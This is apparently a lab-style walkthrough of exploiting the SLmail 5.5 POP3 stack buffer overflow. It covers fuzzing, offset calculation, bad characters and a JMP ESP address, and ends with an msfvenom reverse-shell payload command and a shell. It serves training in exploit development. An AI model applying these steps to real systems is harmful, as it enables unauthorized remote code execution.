Buffer Overflow in Seattle Lab Mail (SLmail) 5.5 - POP3
Simple Stack Based Buffer Overflow Step By Step
In the very first step we will fuzz the application with a simple SPIKE script.
Meanwhile we will also have SLMail attached to (and running under) Immunity Debugger.
More On Spike:: https://resources.infosecinstitute.com/topic/intro-to-fuzzing/
Here is a simple SPIKE script named spike_fuzz.spk
We will run it against the application using the command
line_send_tcp 192.168.1.117 110 spike_fuzz.spk
where 192.168.1.117 is the IP of the target machine running SLMail, and the POP3 service is listening on port 110.
Meanwhile, if we look at Immunity we will see that the application has crashed.
Now we will create a Python PoC that replicates the crash and works out the number of bytes at which the application crashes:
python poc_crash.py
For finding the offset we will use the msf pattern tools:
1. First generate a pattern
2. Note the EIP
3. Query that EIP value and the pattern length with msf to find the offset
msf-pattern_create -l 2700
In poc_offset.py we will use this pattern as our overflow buffer!
python poc_offset.py
At this point we also note the EIP value in Immunity, where the application has crashed and paused.
EIP is 39694438
::For finding the offset::
msf-pattern_offset -l 2700 -q 39694438
The offset is 2606, meaning there are 2606 bytes before we reach EIP, and EIP itself is 4 bytes long.
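As an added illustration (not one of the page's poc_*.py scripts), here is a small Python reimplementation of what msf-pattern_create and msf-pattern_offset do, so you can see why an EIP of 39694438 maps back to offset 2606 in a 2700-byte pattern:

```python
import string
import struct

# Added illustration (not one of the page's poc_*.py scripts): a small
# reimplementation of msf-pattern_create / msf-pattern_offset.


def pattern_create(length: int) -> bytes:
    """Build the cyclic pattern msf-pattern_create emits: 3-byte chunks of
    (uppercase, lowercase, digit) in order Aa0 Aa1 ... Aa9 Ab0 ... Zz9.
    Any 4-byte window in the first 20280 bytes occurs at a single position,
    which is what lets a crashed register value be mapped back to an offset."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)  # caller asked for more than one full cycle (20280 bytes)


def pattern_offset(eip_hex: str, length: int):
    """Return the offset of the 4 bytes that overwrote EIP, or None.

    eip_hex is the value as Immunity shows it (e.g. '39694438'). x86 is
    little-endian, so the bytes that landed in the EIP slot are reversed in
    memory ('8Di9'); like msf-pattern_offset, the big-endian order is also
    tried in case the value was copied from a memory dump instead."""
    value = int(eip_hex, 16)
    pattern = pattern_create(length)
    for candidate in (struct.pack("<I", value), struct.pack(">I", value)):
        idx = pattern.find(candidate)
        if idx != -1:
            return idx
    return None


if __name__ == "__main__":
    # Values from this walkthrough: a 2700-byte pattern and EIP = 39694438.
    print(pattern_offset("39694438", 2700))  # 2606
```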
Now we will try to overwrite EIP with four B's, i.e. in Immunity we should see 42424242 {hex for 4 B's}
python poc_eip_control.py
And now if we check Immunity
To keep this simple and short, you can run the poc_badchars.py script and find the bad characters yourself.
In short: this application has two bad characters (which are also the default ones). When we run poc_badchars.py the first time we will see that the character \x0a acts up, so we remove it from our bad chars payload and run the script again. The second time we will see that the character \x0d is skipped, so this is our second bad char and we remove it from our payload as well. After this, when we run the script a third time, everything is clear and good!!
Bad chars are :: \x00\x0a\x0d
{null byte, line feed, carriage return}
python poc_badchars.py
First we find the right module using Mona's modules listing in Immunity.
slmfc.dll is the most appropriate candidate as it does not have memory protections enabled!
Now we find a JMP ESP address in this DLL.
This address will be written to EIP so that we can redirect the program's execution to ESP, which will result in the execution of our shellcode!
!mona find -s "\xff\xe4" -m slmfc.dll
{\xff\xe4 is the opcode equivalent of JMP ESP}
Out of the 19 pointer addresses we choose the first one.
Now we will put all this together and drop a shell:
1.) generate the shellcode {excluding the bad chars}
2.) add the address we found {remember little endian}
3.) add the buffer, return address, some NOP sled, and the shellcode
4.) we have a shell
Let's quickly generate the shellcode using msfvenom:
msfvenom -p windows/shell_reverse_tcp LHOST=<listening-ip> LPORT=<listening-port> EXITFUNC=thread -f py -a x86 -b "\x00\x0a\x0d"
We put everything together in the exploit.py file.
This time we run SLMail without Immunity and also listen for incoming connections at the same time.
Once that is done we run the final exploit.py script!
EXCELLENT, WE HAVE A SHELL!